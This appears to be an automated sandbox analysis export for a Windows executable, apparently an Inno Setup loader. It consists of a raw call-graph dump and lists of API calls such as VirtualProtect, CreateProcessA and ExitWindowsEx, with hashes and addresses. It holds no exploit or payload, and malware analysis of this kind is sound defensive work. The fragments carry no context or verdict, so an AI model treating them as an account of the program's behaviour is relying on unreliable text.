6038->6039 6041 407fed 6038->6041 6049 407f10 6039->6049 6042 408021 6041->6042 6043 408015 6041->6043 6044 408017 6041->6044 6045 40804e 6042->6045 6047 407d7c 19 API calls 6042->6047 6063 407e2c 6043->6063 6060 407d7c 6044->6060 6047->6045 6050 407f25 6049->6050 6051 407d7c 19 API calls 6050->6051 6052 407f34 6050->6052 6051->6052 6053 407f6e 6052->6053 6054 407d7c 19 API calls 6052->6054 6055 407f82 6053->6055 6056 407d7c 19 API calls 6053->6056 6054->6053 6059 407fae 6055->6059 6070 407eb8 6055->6070 6056->6055 6059->6041 6073 4058b4 6060->6073 6062 407d9e 6062->6042 6064 405184 19 API calls 6063->6064 6065 407e57 6064->6065 6081 407de4 6065->6081 6067 407e5f 6068 403198 4 API calls 6067->6068 6069 407e74 6068->6069 6069->6042 6071 407ec7 VirtualFree 6070->6071 6072 407ed9 VirtualAlloc 6070->6072 6071->6072 6072->6059 6074 4058c0 6073->6074 6075 405184 19 API calls 6074->6075 6076 4058ed 6075->6076 6077 4031e8 4 API calls 6076->6077 6078 4058f8 6077->6078 6079 403198 4 API calls 6078->6079 6080 40590d 6079->6080 6080->6062 6082 4058b4 19 API calls 6081->6082 6083 407e06 6082->6083 6083->6067 6501 40a0d5 6502 40a105 6501->6502 6503 40a10f CreateWindowExA SetWindowLongA 6502->6503 6504 405184 19 API calls 6503->6504 6505 40a192 6504->6505 6506 4032fc 4 API calls 6505->6506 6507 40a1a0 6506->6507 6508 4032fc 4 API calls 6507->6508 6509 40a1ad 6508->6509 6510 406b7c 5 API calls 6509->6510 6511 40a1b9 6510->6511 6512 4032fc 4 API calls 6511->6512 6513 40a1c2 6512->6513 6514 4099a4 29 API calls 6513->6514 6515 40a1d4 6514->6515 6516 409884 5 API calls 6515->6516 6517 40a1e7 6515->6517 6516->6517 6518 40a220 6517->6518 6519 4094d8 9 API calls 6517->6519 6520 40a239 6518->6520 6523 40a233 RemoveDirectoryA 6518->6523 6519->6518 6521 40a242 73A25CF0 6520->6521 6522 40a24d 6520->6522 6521->6522 6524 40a275 6522->6524 6525 40357c 4 API calls 6522->6525 6523->6520 6526 40a26b 6525->6526 6527 4025ac 4 API calls 6526->6527 6527->6524 6086 40a0e7 6087 40a0eb SetLastError 6086->6087 6118 409648 GetLastError 6087->6118 6090 40a105 6092 40a10f CreateWindowExA SetWindowLongA 6090->6092 6091 402f24 5 API calls 6091->6090 6093 405184 19 API calls 6092->6093 6094 40a192 6093->6094 6095 4032fc 4 API calls 6094->6095 6096 40a1a0 6095->6096 6097 4032fc 4 API calls 6096->6097 6098 40a1ad 6097->6098 6131 406b7c GetCommandLineA 6098->6131 6101 4032fc 4 API calls 6102 40a1c2 6101->6102 6136 4099a4 6102->6136 6105 409884 5 API calls 6106 40a1e7 6105->6106 6107 40a220 6106->6107 6108 40a207 6106->6108 6110 40a239 6107->6110 6113 40a233 RemoveDirectoryA 6107->6113 6152 4094d8 6108->6152 6111 40a242 73A25CF0 6110->6111 6112 40a24d 6110->6112 6111->6112 6114 40a275 6112->6114 6160 40357c 6112->6160 6113->6110 6116 40a26b 6117 4025ac 4 API calls 6116->6117 6117->6114 6119 404c84 19 API calls 6118->6119 6120 40968f 6119->6120 6121 407284 5 API calls 6120->6121 6122 40969f 6121->6122 6123 408da8 4 API calls 6122->6123 6124 4096b4 6123->6124 6125 405880 4 API calls 6124->6125 6126 4096c3 6125->6126 6127 4031b8 4 API calls 6126->6127 6128 4096e2 6127->6128 6129 403198 4 API calls 6128->6129 6130 4096ea 6129->6130 6130->6090 6130->6091 6132 406af0 4 API calls 6131->6132 6133 406ba1 6132->6133 6134 403198 4 API calls 6133->6134 6135 406bbf 6134->6135 6135->6101 6137 4033b4 4 API calls 6136->6137 6138 4099df 6137->6138 6139 409a11 CreateProcessA 6138->6139 6140 409a24 CloseHandle 6139->6140 6141 409a1d 6139->6141 6143 409a2d 6140->6143 6142 409648 21 API calls 6141->6142 6142->6140 6173 409978 6143->6173 6146 409a49 6147 409978 3 API calls 6146->6147 6148 409a4e GetExitCodeProcess CloseHandle 6147->6148 6149 409a6e 6148->6149 6150 403198 4 API calls 6149->6150 6151 409a76 6150->6151 6151->6105 6151->6106 6153 409532 6152->6153 6157 4094eb 6152->6157 6153->6107 6154 4094f3 Sleep 6154->6157 6155 409503 Sleep 6155->6157 6157->6153 6157->6154 6157->6155 6158 40951a GetLastError 6157->6158 6177 408fbc 6157->6177 6158->6153 6159 409524 GetLastError 6158->6159 6159->6153 6159->6157 6161 403591 6160->6161 6162 4035a0 6160->6162 6167 4035d0 6161->6167 6168 40359b 6161->6168 6169 4035b6 6161->6169 6163 4035b1 6162->6163 6164 4035b8 6162->6164 6165 403198 4 API calls 6163->6165 6166 4031b8 4 API calls 6164->6166 6165->6169 6166->6169 6167->6169 6171 40357c 4 API calls 6167->6171 6168->6162 6170 4035ec 6168->6170 6169->6116 6170->6169 6185 403554 6170->6185 6171->6167 6174 40998c PeekMessageA 6173->6174 6175 409980 TranslateMessage DispatchMessageA 6174->6175 6176 40999e MsgWaitForMultipleObjects 6174->6176 6175->6174 6176->6143 6176->6146 6178 408f70 2 API calls 6177->6178 6179 408fd2 6178->6179 6180 408fd6 6179->6180 6181 408ff2 DeleteFileA GetLastError 6179->6181 6180->6157 6182 409010 6181->6182 6183 408fac Wow64RevertWow64FsRedirection 6182->6183 6184 409018 6183->6184 6184->6157 6187 403566 6185->6187 6188 403578 6187->6188 6189 403604 6187->6189 6188->6170 6190 40357c 6189->6190 6191 4035a0 6190->6191 6196 4035d0 6190->6196 6197 40359b 6190->6197 6198 4035b6 6190->6198 6192 4035b1 6191->6192 6193 4035b8 6191->6193 6194 403198 4 API calls 6192->6194 6195 4031b8 4 API calls 6193->6195 6194->6198 6195->6198 6196->6198 6200 40357c 4 API calls 6196->6200 6197->6191 6199 4035ec 6197->6199 6198->6187 6199->6198 6201 403554 4 API calls 6199->6201 6200->6196 6201->6199 6823 402be9 RaiseException 6824 402c04 6823->6824 6534 402af2 6535 402afe 6534->6535 6538 402ed0 6535->6538 6539 403154 4 API calls 6538->6539 6541 402ee0 6539->6541 6540 402b03 6541->6540 6543 402b0c 6541->6543 6544 402b25 6543->6544 6545 402b15 RaiseException 6543->6545 6544->6540 6545->6544 6825 402dfa 6826 402e26 6825->6826 6827 402e0d 6825->6827 6829 402ba4 6827->6829 6830 402bc9 6829->6830 6831 402bad 6829->6831 6830->6826 6832 402bb5 RaiseException 6831->6832 6832->6830 6833 4075fa GetFileSize 6834 407626 6833->6834 6835 407616 GetLastError 6833->6835 6835->6834 6836 40761f 6835->6836 6837 40748c 21 API calls 6836->6837 6837->6834 6838 406ffb 6839 407008 SetErrorMode 6838->6839 6550 403a80 CloseHandle 6551 403a90 6550->6551 6552 403a91 GetLastError 6550->6552 6553 40a282 6555 40a1f4 6553->6555 6554 40a220 6557 40a239 6554->6557 6560 40a233 RemoveDirectoryA 6554->6560 6555->6554 6556 4094d8 9 API calls 6555->6556 6556->6554 6558 40a242 73A25CF0 6557->6558 6559 40a24d 6557->6559 6558->6559 6561 40a275 6559->6561 6562 40357c 4 API calls 6559->6562 6560->6557 6563 40a26b 6562->6563 6564 4025ac 4 API calls 6563->6564 6564->6561 6565 404283 6566 4042c3 6565->6566 6567 403154 4 API calls 6566->6567 6568 404323 6567->6568 6840 404185 6841 4041ff 6840->6841 6842 4041cc 6841->6842 6843 403154 4 API calls 6841->6843 6844 404323 6843->6844 6569 40a287 6570 40a290 6569->6570 6572 40a2bb 6569->6572 6579 409448 6570->6579 6574 403198 4 API calls 6572->6574 6573 40a295 6573->6572 6577 40a2b3 MessageBoxA 6573->6577 6575 40a2f3 6574->6575 6576 403198 4 API calls 6575->6576 6578 40a2fb 6576->6578 6577->6572 6580 409454 GetCurrentProcess OpenProcessToken 6579->6580 6581 4094af ExitWindowsEx 6579->6581 6582 409466 6580->6582 6583 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6580->6583 6581->6582 6582->6573 6583->6581 6583->6582 6584 403e87 6585 403e4c 6584->6585 6586 403e67 6585->6586 6587 403e62 6585->6587 6588 403e7b 6585->6588 6591 403e78 6586->6591 6597 402674 6586->6597 6593 403cc8 6587->6593 6590 402674 4 API calls 6588->6590 6590->6591 6594 403cd6 6593->6594 6595 402674 4 API calls 6594->6595 6596 403ceb 6594->6596 6595->6596 6596->6586 6598 403154 4 API calls 6597->6598 6599 40267a 6598->6599 6599->6591 6604 407e90 6605 407eb8 VirtualFree 6604->6605 6606 407e9d 6605->6606 6853 403991 6854 403983 6853->6854 6855 40374c VariantClear 6854->6855 6856 40398b 6855->6856 6857 405b92 6859 405b94 6857->6859 6858 405bd0 6862 405930 5 API calls 6858->6862 6859->6858 6860 405be7 6859->6860 6861 405bca 6859->6861 6866 404ccc 5 API calls 6860->6866 6861->6858 6863 405c3c 6861->6863 6864 405be3 6862->6864 6865 4059a0 19 API calls 6863->6865 6867 403198 4 API calls 6864->6867 6865->6864 6868 405c10 6866->6868 6869 405c76 6867->6869 6870 4059a0 19 API calls 6868->6870 6870->6864 6609 403e95 6610 403e4c 6609->6610 6611 403e62 6610->6611 6612 403e7b 6610->6612 6614 403e67 6610->6614 6613 403cc8 4 API calls 6611->6613 6615 402674 4 API calls 6612->6615 6613->6614 6616 403e78 6614->6616 6617 402674 4 API calls 6614->6617 6615->6616 6617->6616 6618 403a97 6619 403aac 6618->6619 6620 403bbc GetStdHandle 6619->6620 6621 403b0e CreateFileA 6619->6621 6631 403ab2 6619->6631 6622 403c17 GetLastError 6620->6622 6626 403bba 6620->6626 6621->6622 6623 403b2c 6621->6623 6622->6631 6625 403b3b GetFileSize 6623->6625 6623->6626 6625->6622 6627 403b4e SetFilePointer 6625->6627 6628 403be7 GetFileType 6626->6628 6626->6631 6627->6622 6632 403b6a ReadFile 6627->6632 6630 403c02 CloseHandle 6628->6630 6628->6631 6630->6631 6632->6622 6633 403b8c 6632->6633 6633->6626 6634 403b9f SetFilePointer 6633->6634 6634->6622 6635 403bb0 SetEndOfFile 6634->6635 6635->6622 6635->6626 6889 4011aa 6890 4011ac GetStdHandle 6889->6890 6228 4076ac SetEndOfFile 6229 4076c3 6228->6229 6230 4076bc 6228->6230 6231 40748c 21 API calls 6230->6231 6231->6229 6639 4028ac 6640 402594 4 API calls 6639->6640 6641 4028b6 6640->6641 6642 401ab9 6643 401a96 6642->6643 6644 401aa9 RtlDeleteCriticalSection 6643->6644 6645 401a9f RtlLeaveCriticalSection 6643->6645 6645->6644

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 129 409b7f-409b82 126->129 127->128 130 409baa-409bad 128->130 129->124 129->128 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                    APIs
                                                    • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                    • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                    • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Virtual$ProtectQuery$InfoSystem
                                                    • String ID:
                                                    • API String ID: 2441996862-0
                                                    • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                    • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                    • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                    • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                    • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                    • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                    • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModulePolicyProcess
                                                    • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                    • API String ID: 3256987805-3653653586
                                                    • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                    • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                    • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                    • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                    Control-flow Graph

                                                    APIs
                                                    • SetLastError.KERNEL32 ref: 0040A0F4
                                                      • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,020E23B4), ref: 0040966C
                                                    • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                    • SetWindowLongA.USER32(00010414,000000FC,00409918), ref: 0040A148
                                                    • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                    • 73A25CF0.USER32(00010414,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                    • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                    • API String ID: 3341979996-3001827809
                                                    • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                    • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                    • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                    • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                    • API String ID: 1646373207-2130885113
                                                    • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                    • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                    • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                    • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                    • SetWindowLongA.USER32(00010414,000000FC,00409918), ref: 0040A148
                                                      • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                      • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020E23B4,00409A90,00000000,00409A77), ref: 00409A14
                                                      • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020E23B4,00409A90,00000000), ref: 00409A28
                                                      • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                      • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                      • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020E23B4,00409A90), ref: 00409A5C
                                                    • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                    • 73A25CF0.USER32(00010414,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                    • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                    • API String ID: 978128352-3001827809
                                                    • Opcode ID: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                    • Instruction ID: f39d198f6ca78f9e57da3cbf677d536b45cc778db879de651171db1d1b5627bc
                                                    • Opcode Fuzzy Hash: abb3e52ba2d34a87c951cbeec188d4c3ff7361d17d45cb79fe2b458f8c7fb345
                                                    • Instruction Fuzzy Hash: 07411A71604204DFD714EBA9EE86B5A77A4EB49304F10427EE514B73E1CBB8A810CB9D

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020E23B4,00409A90,00000000,00409A77), ref: 00409A14
                                                    • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020E23B4,00409A90,00000000), ref: 00409A28
                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                    • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                    • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,020E23B4,00409A90), ref: 00409A5C
                                                      • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,020E23B4), ref: 0040966C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                    • String ID: D
                                                    • API String ID: 3356880605-2746444292
                                                    • Opcode ID: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                    • Instruction ID: 6ea97129cf5aa135a7f7046e3a99eae43c862e8aca722617c6144c18eae127a8
                                                    • Opcode Fuzzy Hash: ad223a4d496df5c95c16f58257358154d13b00c0811500baad5b3d8f4e498b4c
                                                    • Instruction Fuzzy Hash: 3A1142B17442486EDB10EBE68C42FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                    Control-flow Graph

                                                    APIs
                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: .tmp$y@
                                                    • API String ID: 2030045667-2396523267
                                                    • Opcode ID: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                    • Instruction ID: eba11cc0b212557bcf85e4c41764595d0d3f2f842990b0293eb01d0c1562b25b
                                                    • Opcode Fuzzy Hash: 68ca499064e88ad8d4bc1f4a2fd3397b1c963b2c890da41c2fdfea5cc663c78d
                                                    • Instruction Fuzzy Hash: 9841BD30600200DFC711EF25DE96A5A77A5EB49304B50463AF804B73E2CBB9AC05CBED

                                                    Control-flow Graph

                                                    APIs
                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: .tmp$y@
                                                    • API String ID: 2030045667-2396523267
                                                    • Opcode ID: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                    • Instruction ID: fef9de22095f7e51d457e3baefdda2d393bbfb66a144e2f6f14d312cbfdc2d61
                                                    • Opcode Fuzzy Hash: b92571b7798fdf1738320cf5764acc74050170256781880fb7a821db28d3127f
                                                    • Instruction Fuzzy Hash: 3A418D70610204DFC711EF25DED6A5A77A5EB49308B50463AF804B73E2CBB9AC05CBAD

                                                    Control-flow Graph

                                                    APIs
                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2919052063.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2919026745.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919083809.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2919110823.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_vc8Kx5C54G.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectoryErrorLast
                                                    • String ID: .tmp
                                                    • API String ID: 1375471231-2986845003
                                                    • Opcode ID: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                    • Instruction ID: a1094b0e4056d8a2da25745c6e48f9a4b2523a9a3c4edc503687ab74cbc79d39
                                                    • Opcode Fuzzy Hash: 8228534b5fce36e17f8a1a4f12b5018fbfc2097e6833105d4f39ac42e8c6f43b
                                                    • Instruction Fuzzy Hash: 3A213674A002099BDB05FFA1C9429DEB7B9EF48304F50457BE901B73C2DA7C9E059AA5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
